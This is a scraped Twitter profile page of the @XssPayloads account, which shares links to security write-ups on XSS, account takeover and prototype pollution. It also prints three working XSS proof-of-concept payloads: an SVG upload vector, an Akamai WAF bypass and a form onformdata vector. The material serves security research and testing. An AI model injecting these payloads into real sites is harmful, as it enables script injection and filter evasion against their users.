XSS Payloads(@XssPayloads) 's Twitter Profileg
XSS Payloads

@XssPayloads

ID:2893592123

linkhttps://xss-payloads.paracyberbellum.io calendar_today26-11-2014 17:54:23

1,5K Tweets

43,0K Followers

0 Following

XSS Payloads(@XssPayloads) 's Twitter Profile Photo

How we escalated a DOM XSS to a sophisticated 1-click Account Takeover, a great article by Benasin and Long Phan Nguyên
Part 1: bit.ly/49N43qs
Part 2: bit.ly/3xXB2Ld

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

A nice collection of Server-Side Prototype Pollution gadgets by Mikhail Shcherbakov and the KTH Royal Institute of Technology
github.com/KTH-LangSec/se…

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

SVG File upload payload by Stealthy

<svg> <foreignObject width='100%' height='100%'> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

x.com/stealthybugs/s…

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

Akamai WAF bypass XSS, by smaury
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

Reply to calc: The Attack Chain to Compromise Mailspring, great finding turning an XSS to an RCE, by Yaniv Nizry
bit.ly/3ThiInh

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

Form submission vector, by Mateo Hanžek
<form onformdata='alert(1)'><button>Click</button></form>

Now added to PortSwigger Research XSS Cheatsheet:
portswigger.net/web-security/c…

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

OpenNMS Vulnerabilities: Securing Code against Attackers’ Unexpected Ways, excellent article by Stefan Schiller using SNMP traps as XSS vector and leading to RCE.
bit.ly/4372FNA

account_circle
XSS Payloads(@XssPayloads) 's Twitter Profile Photo

Exploiting CSP Wildcards for Google Domains, a nice finding by Attacks Ships On Fire (attackshipsonfi.re)
bit.ly/3P2bjXH

account_circle